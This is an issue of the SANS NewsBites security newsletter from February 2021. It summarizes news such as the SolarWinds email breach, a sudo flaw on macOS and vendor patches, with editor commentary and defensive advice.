SANS NewsBites

SolarWinds Hackers Accessed eMail for Months; MacOS sudo Vulnerability

February 5, 2021  |  Volume XXIII - Issue #10

Top of the News


2021-02-03

SolarWinds Hackers Had Access to eMail System for Months

According to a report in the Wall Street Journal (subscription required), the threat actors behind the SolarWinds supply-chain attack likely had access to SolarWinds email system for nearly a year. In an interview, SolarWinds CEO Sudhakar Ramakrishna said that the attackers had access to SolarWinds email accounts in December 2019. (Please note that the WSJ story is behind a paywall.)

Editor's Note

Reducing dwell time by earlier detection is something we all are challenged with. Cloud email providers have tools to help. Make sure to enable the threat detection capabilities in your email system, that you've got adequate monitoring/alerting which is integrated with your SIEM. Also use tools such as the ones from Microsoft and FireEye to detect post-compromise activity to make sure that you're clean now and in the future.

Lee Neely
Lee Neely

2021-02-04

SolarWinds Patches Three New Vulnerabilities

SolarWinds has released fixes for three serious security issues. Two of the flaws affect SolarWinds Orion User Device Tracker; the third affects SolarWinds Serv-U FTP for Windows. The flaws were detected by a researcher at Trustwave who notified SolarWinds in late December. SolarWinds released fixes for the flaws in an update last week.

Editor's Note

SolarWinds is going to be under the microscope as they recover from their breach. Even so, their updates and fixes need to be considered and applied if warranted. If you're bound by DHS's ED 21-01 (https://cyber.dhs.gov/ed/21-01/#supplemental-guidance-v3) and permitted to run Orion, the directive is to use at least version 2020.2.1 HF2, so you're ok to install 2020.2.4. Definitely patch any internet facing Serv-U FTP servers.

Lee Neely
Lee Neely

SolarWinds obviously has a credibility problem around updates, since compromised SolarWinds Orion updates were used to infiltrate many SolarWinds customers. Trusted, high-quality patches and updates are key to rapid patching - just like the false positive rate of detection processes and products is key to rapid prevention/mitigation. See related comment on the "Better Patches Could Reduce the Number of Zero Days" item.

John Pescatore
John Pescatore

2021-02-03

Sudo Vulnerability Affects macOS

A vulnerability recently detected in LINUX Sudo has been found to also affect the most recent version of macOS, Big Sur 11.2. The heap overflow bug could be exploited to gain elevated privileges. No fix is currently available for macOS 11.2.

Editor's Note

This flaw has also been reproduced on AIX. Until explicitly updated, assume all sudo versions are vulnerable. macOS users cannot update sudo directly due to OS integrity protection, introduced in macOS 10.11, which restricts overwriting of applications or files. Expect a fix in the next OS update from Apple.

Lee Neely
Lee Neely

This is a privilege escalation vulnerability, requires access, and is mostly of concern in multi-user or managed systems. That said, this is a case where code has been reused in tens of products for a decade without anyone assessing its quality and suitability. Open source is not delivering on its security promise. What is everyone's responsibility is no one's responsibility. Developers must be held responsible for all the code in their products without regard to source.

William Hugh Murray
William Hugh Murray

The Rest of the Week's News


2021-02-02

Claim: in-toto Cybersecurity System Might Have Helped Prevent SolarWinds Attack

The academic developers of a cybersecurity system protocol funded by the US government claim their approach might have been able to prevent or diminish the severity of the SolarWinds supply-chain attack. The system, called in-toto, "is designed to ensure the integrity of a software product from initiation to end-user installation. It does so by making it transparent to the user what steps were performed, by whom and in what order. As a result, with some guidance from the group creating the software, in-toto allows the user to verify if a step in the supply chain was intended to be performed, and if the step was performed by the right actor." The US government has never required its vendors to use in-toto.

Editor's Note

Perhaps the in-toto developers (and the journalists implying the government is incompetent) might first want to prove their approach works at scale in their own universities, and that it has been widely adopted there and works effectively for large complex systems.

Alan Paller
Alan Paller

2021-02-03

Better Patches Could Reduce the Number of Zero-days

Maddie Stone, a Google security researcher, told an audience at the USENIX Enigma 2021 virtual conference that more than one-third of the 24 zero-day vulnerabilities Google's Project Zero team found last year were variants of other security issues that had already been disclosed or had been incompletely patched. In a blog post, Stone writes, "If more vulnerabilities are patched correctly and comprehensively, it will be harder for attackers to exploit 0-days."

Editor's Note

It's easy to get tunnel-vision when a flaw is reported and only address that issue, particularly when facing a disclosure countdown. The security code review has to begin at inception, not after flaws are discovered; it's a nearly insurmountable task to review and fix existing applications. One approach is to augment bug fix procedures to include activities to seek and find and remediate similar flaws elsewhere in the code, possibly necessitating a second release.

Lee Neely
Lee Neely

(Long anecdote coming, you can skip to the last sentence if not in the mood.) Years ago I worked for the Secret Service and part of the job was being part of advance teams and doing "technical security" in places where the protectee would visit or stay overnight. In hotels, we had to get the elevator maintenance guy to come in, inspect the elevators and recommend which one was the most reliable. On the first trip I worked solo after training and working in tandem for a few trips, in Denver, the Otis elevator guy said "I just did a repair and full preventive maintenance on elevator A, but elevator B never fails - you should use B. It always seems like on these new fancy elevators with all the electronics when I fix something, I also weaken something else that breaks the following week." I felt that elevator B was probably due to fail, ignored the advice, chose elevator A and the next morning Vice President George H. W. Bush got stuck in elevator A when the doors opened three feet above the lobby. Much paperwork ensued. Moral of the story: as we learned with Windows patches in the early days, too many software vendors treat patching as a drain on profits and don't invest in doing it right. Poor patch QA is usually a sign of bigger problems at the vendor - lack of sufficient maturity in software life cycle, under investment in QA overall, etc.

John Pescatore
John Pescatore

2021-02-03

StormShield Discloses Security Incident

French cybersecurity company StormShield has disclosed that it "detected a security incident that resulted in an unauthorized access to a technical portal used ... by our customers and partners for the management of their support tickets on our products." The intruders also appear to have stolen some StormShield Network Security source code. StormShield has notified affected customers and has contacted authorities regarding the incident.


2021-02-02

Ransomware Operators are Targeting Industrial Goods and Services

According to data gathered by Digital Shadows, ransomware operators targeted organizations in the industrial goods and services sector more than any other; it accounts for 29 percent of reported ransomware attacks. The three next most-targeted sectors - construction, technology, and retail - account for nine, eight, and seven percent of reported ransomware attacks.


2021-02-04

SonicWall Firmware Patch

SonicWall has released a firmware patch to address critical vulnerabilities in SMA 100 series 10.x code that are being actively exploited. The issues are fixed in the SMA 100 series firmware 10.2.0.5-29sv update.


2021-02-02

Kobalos Malware Targets High-Performance Computing Networks

A small piece of backdoor malware is targeting high-performance computing clusters. Dubbed Kobalos by researchers at ESET, the "malware gives access to the file system of the compromised host and enables access to a remote terminal, giving the attackers the ability to run arbitrary commands." ESET surmised that the systems infected with Kobalos are specifically targeted because they belong to high-profile organizations.

Editor's Note

I work with a High-Performance Computing (HPC) group which has required 2FA authentication on SSH, and limited which SSK keys, particularly from third-party organizations, can be installed, for 21 years. Those simple mitigations, along with rigorous configuration management and monitoring, are very effective controls. HPC is a very different environment from conventional data center computing resources. HPC services are often exposed to the Internet due the size of data exchanged, and resources carefully allocated and managed. While we were getting used to gigabytes, they were working in terabyte and petabyte data sets, and in-line security devices which introduce latency can fatally impact operations. They look back on when they could only get 40gb network connections. Note that ESET has published IOCs for detecting the malware; see the We Live Security PDF below.

Lee Neely
Lee Neely

2021-02-04

Cisco Releases Fixes for Vulnerabilities Affecting Some VPN Routers

Cisco has released updates to address for multiple vulnerabilities in its small-business VPN routers models RV160, RV160W, RV260, RV260P, and RV260W running firmware releases prior to 1.0.01.02. The flaws exist in the routers' web-based management interface.

Editor's Note

Vendors and users should prefer purpose-built management interfaces.

William Hugh Murray
William Hugh Murray

2021-02-06

Wordfence: Remove Contact Form 7 Style WordPress Plugin

Wordfence is warning of an unpatched Cross-Site Request Forgery (CSRF) to Stored Cross Site Scripting (XSS) vulnerability affecting the Contact Form 7 Style WordPress plugin. (Contact Form 7 Style is an add-on to the Content Form 7 plugin.) The plugin's developer has been contacted several times but has not responded. WordFence "strongly recommends deactivating and removing this plugin and finding a replacement as it no longer appears to be maintained by its developer."

Editor's Note

Read carefully: the flaw is in the Contact Form 7 Style plugin, not the Contact Form 7 plugin itself; if you have other plugins for Contact Form 7, make sure they are up-to-date. If you are running Wordfence, free or paid, the built-in XSS protections will mitigate attempted exploits. Even so, a plugin that is not being actively supported should be removed/replaced before additional unpatched flaws are discovered.

Lee Neely
Lee Neely

WordPress plugin of the week. Use plugins sparingly and police them actively.

William Hugh Murray
William Hugh Murray

2021-02-04

IBM Announces Grant Program to Help Schools with Ransomware Protection

IBM has announced a $3 million grant program to help US school districts protect their systems from ransomware. IBM will award $500,000 in-kind grants to six school districts, which will be chosen through an application process. The applications opened on February 4 and close on March 1, 2021. Teams from IBM's Service Corps Program will "help [the selected schools] proactively prepare for and respond to cyberattacks."

Editor's Note

With the increased reliance on network services to deliver classroom content, and without corresponding increases in cyber security initiatives to help keep those services and online activities secure, these grants may be helpful. These in-kind grants include a team of six to ten people from IBM's Service Corps Program to help develop incident response plans and implement basic cyber security training, including online hygiene and password management.

Lee Neely
Lee Neely

Certainly a worthy effort but it shines a light on just how costly this problem is. There are 130K school districts in the US. At $500K per, "pretty soon, that adds up to real money."

William Hugh Murray
William Hugh Murray

Internet Storm Center Tech Corner

SolarWinds SANS Lightning Summit

https://www.sans.org/webcasts/solarwinds-lightning-summit-118550


New Example of XSL Script Processing aka "Mitre T1220"

https://isc.sans.edu/forums/diary/New+Example+of+XSL+Script+Processing+aka+Mitre+T1220/27056/


Excel Spreadsheets Push SystemBC Malware

https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/


Abusing Google Chrome Extension Syncing For Data Exfiltration and C&C

https://isc.sans.edu/forums/diary/Abusing+Google+Chrome+extension+syncing+for+data+exfiltration+and+CC/27066/


Camerfirma Certificate Authority Revocation

https://groups.google.com/g/mozilla.dev.security.policy/c/jif4zWNgGPw


Social Engineering Attacks against Security Researchers Used IE 0 day

https://enki.co.kr/blog/2021/02/04/ie_0day.html

https://www.bleepingcomputer.com/news/security/hacking-group-also-used-an-ie-zero-day-against-security-researchers/


Kobalos HPC Linux Malware

https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/


Agent Tesla Overwrites Windows AMSI

https://threatpost.com/agent-tesla-microsoft-asmi/163581/


SolarWinds Vulnerability

https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28389


SonicWall Patch

https://www.sonicwall.com/support/product-notification/urgent-patch-available-for-sma-100-series-10-x-firmware-zero-day-vulnerability-updated-feb-3-2-p-m-cst/210122173415410/


Cisco Advisories

https://tools.cisco.com/security/center/publicationListing.x


Realtek RTL8195A Wi-Fi Module Vulnerability

https://www.vdoo.com/blog/realtek-rtl8195a-vulnerabilities-discovered


Microsoft Defender ATP Google Chrome False Positive

https://twitter.com/itquartz/status/1356940218138509312